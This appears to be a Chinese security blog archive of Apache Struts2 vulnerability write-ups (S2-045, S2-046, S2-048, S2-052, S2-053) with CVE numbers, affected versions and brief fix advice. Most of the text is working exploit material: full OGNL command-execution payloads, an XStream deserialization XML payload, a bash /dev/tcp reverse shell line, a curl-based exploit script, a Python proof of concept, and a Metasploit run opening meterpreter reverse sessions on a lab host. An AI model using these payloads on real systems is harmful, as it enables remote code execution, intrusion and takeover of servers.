标签归档:Java安全

【Struts2】S2-053

漏洞描述
当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞。
当在Freemarker标签中使用表达式常量或强制表达式时使用请求值可能会导致远程代码执行漏洞(见下面的示例)。
<@s.hidden name=”redirectUri” value=redirectUri />
<@s.hidden name=”redirectUri” value=”${redirectUri}” />
在这两种情况下,值属性都使用可写属性,都会受到Freemarker的表达式的影响。

CVE
CVE-2017-12611

受影响版本
Struts 2.0.1 – Struts 2.3.33
Struts 2.5 – Struts 2.5.10

漏洞测试

[root@mail ~]# systemctl start docker.service

下载Image

[root@mail ~]# docker pull medicean/vulapps:s_struts2_s2-053

列出镜像列表

[root@mail ~]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/medicean/vulapps s_struts2_s2-053 91603dee10fd 4 days ago 297.7 MB
docker.io/medicean/vulapps s_struts2_s2-052 dd0f12c42bc5 7 days ago 341.8 MB

启动容器

docker run -d -p 80:8080 91603dee10fd

查看当前运行的容器

[root@mail ~]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
7ad5e8fd7ae7 91603dee10fd "/usr/local/tomcat/bi" 2 minutes ago Up 2 minutes 0.0.0.0:80->8080/tcp peaceful_raman

POC

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream(),"GBK"))}

参考文章
http://anquan.360.cn/news/detail/4295.html

 

【Struts2】S2-052

Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。Struts2启用了rest-plugin后并编写并设置了XStreamHandler后,可以导致远程命令执行这一严重问题。实际场景中存在一定局限性,需要满足一定条件,非struts本身默认开启的组件。

影响版本:
Version 2.5.0 to 2.5.12
Version 2.3.0 to 2.3.33

修复版本:
Struts 2.5.13
Struts 2.3.34

漏洞验证:
从struts2的官网下载最后受影响的版本struts-2.5.12,地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
部署项目struts2-rest-showcase.war,Edit后提交的时候,截断数据包。
修改Content-Type: application/xml
修改POST内容为:

<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/system32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>

弹出计算机

需要注意JDK版本为1.8,低版本的JDK测试不行。
POC command标签内的空格需要以分开是string标签形式。
例如touch /tmp/xxx
需要写成

<command> 
<string>touch</string>
<string>/tmp/xxx</string>
</command>

Linux下实际测试自己搭建环境(CentOS6.5 apache-tomcat-8.0.46)
创建文件可以

<command> 
<string>touch</string>
<string>/tmp/xxx</string>
</command>

但是使用如下POC无法反弹shell(只能发出连接,无法反弹Bash),不知道和环境是否有关系。

<command>
<string>bash</string>
<string>-c</string>
<string>bash -i >&amp; /dev/tcp/x.x.x.x/port 0>&amp;1</string>
</command>

还有测试过程如果不行可以清空tomcat目录下work目录再试试。

 

Linux下获取meterpreter
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
msfconsole

msf > use exploit/multi/http/struts2_rest_xstream

msf exploit(struts2_rest_xstream) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(struts2_rest_xstream) > set lhost 172.16.100.177
lhost => 172.16.100.177

msf exploit(struts2_rest_xstream) > show options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.100.155                   yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts app
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.100.177   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Apache Struts 2.5 - 2.5.12

msf exploit(struts2_rest_xstream) > exploit 

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/tD86RKaLdwV
[*] Local IP: http://172.16.100.177:8080/tD86RKaLdwV
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(struts2_rest_xstream) > exploit 

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/CFpeUWr3UO3b7s5
[*] Local IP: http://172.16.100.177:8080/CFpeUWr3UO3b7s5
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /rw7AbVJ4D8RcPFo-BYSmjA9L-dN7OPSB7NnI1R5R97ZHeZ8zC6CFm7WTV9KBp4CWjTHPZ2nnj_9tLmcClEo3QwMO8YXRdG4HGoLfAcOWNx43fBFbD with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.100.177:8443 -> 172.16.100.155:58051) at 2017-09-13 17:32:56 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /hkiZkZ_fW9LcAdoDhbknRgM_qsJFpQYWAWkJT5Qjt8QVFopVe0ypSG-eoVv9eKJp5I_n0ZKxaKy66ZT with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (172.16.100.177:8443 -> 172.16.100.155:53330) at 2017-09-13 17:33:04 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command Stager progress - 100.00% done (122/122 bytes)
[*] Server stopped.

meterpreter > sysinfo 
Computer     : 172.16.100.155
OS           : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter  : x64/linux

修复建议:
1.官方建议设置插件处理的数据类型限定为json
<constant name=”struts.action.extension” value=”xhtml,,json” />
2.升级Struts到2.5.13版本或2.3.34版本
3.在XStreamHandler中进行数据校验或检查

参考文章:
http://bobao.360.cn/learning/detail/4372.html
https://github.com/jas502n/St2-052

【Struts2】S2-048

漏洞编号
CVE-2017-9791

漏洞描述
在Struts 2.3.x 系列的 Showcase 应用中演示Struts2-struts1-plugin插件中存在一处任意代码执行漏洞。当你的应用使用了Struts2-struts1-plugin时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。

[root@server144 webapps]# ll struts2-showcase/WEB-INF/lib/struts2-struts1-plugin-2.3.20.jar
-rw-r--r-- 1 root root 32799 Nov 21 2014 struts2-showcase/WEB-INF/lib/struts2-struts1-plugin-2.3.20.jar

漏洞测试:

http://192.168.192.144:32108/struts2-showcase/integration/editGangster.action

提交name值为:

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

解决方案:
1)停用 showcase.war
2)开发者通过使用 resource keys 替代将原始消息直接传递给 ActionMessage 的方式。 如下所示:

messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));

请不要使用如下的方式

messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));

参考链接:
http://www.mamicode.com/info-detail-1895073.html
https://github.com/jas502n/st2-048

【Struts2】S2-046

触发条件:

1)上传文件的大小(由Content-Length头指定)大于Struts2允许的最大大小(2GB)。
2)header中的Content-Disposition中包含空字节。
3)文件名内容构造恶意的OGNL内容。


检测脚本:

#!/bin/bash
 
url=$1
cmd=$2
shift
shift
 
boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")
 
printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@

测试结果:

[root@server120 tmp]# ./1.sh http://192.168.192.144:32108/struts2-showcase/index.action whoami
root

修复建议:

1. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。
2. 如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。


参考文章:

http://bobao.360.cn/learning/detail/3571.html

【Struts2】S2-045

今天上午爆出最新Struts2命令执行漏洞S2-045,在使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。


漏洞详情:

漏洞编号:S2-045
CVE编号:CVE-2017-5638
攻击者可修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令。由于该漏洞利用无需任何前置条件(如开启dmi ,debug等功能)以及启用任何插件,因此漏洞危害较为严重。
解压struts2-core-*.jar文件,找到default.properties,其中struts.multipart.parser的值为jakarta解析器,是Struts 2框架的标准组成部分。
默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。
官方链接:https://cwiki.apache.org/confluence/display/WW/S2-045


影响范围:

风险等级:高风险
漏洞风险:攻击者通过利用漏洞可以实现远程命令执行
影响版本:Struts 2.3.5-Struts 2.3.31、Struts 2.5-Struts 2.5.10
自查方式:用户可查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar 文件,如果这个版本在Struts2.3.5到Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞。


修复建议:

1)升级到安全版本:Struts 2.3.32、Struts 2.5.10.1
Struts 2.3.32下载地址:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
Struts 2.5.10.1下载地址:
https ://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
替换struts2-core-*.jar
2)使用Servlet过滤器验证Content-Type过滤不匹配的请求multipart/form-data


漏洞验证:

pip install poster
POC:

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()
poc()

参考文章:

http://www.freebuf.com/vuls/128668.html
http://bobao.360.cn/learning/detail/3571.html
http://www.mottoin.com/97954.html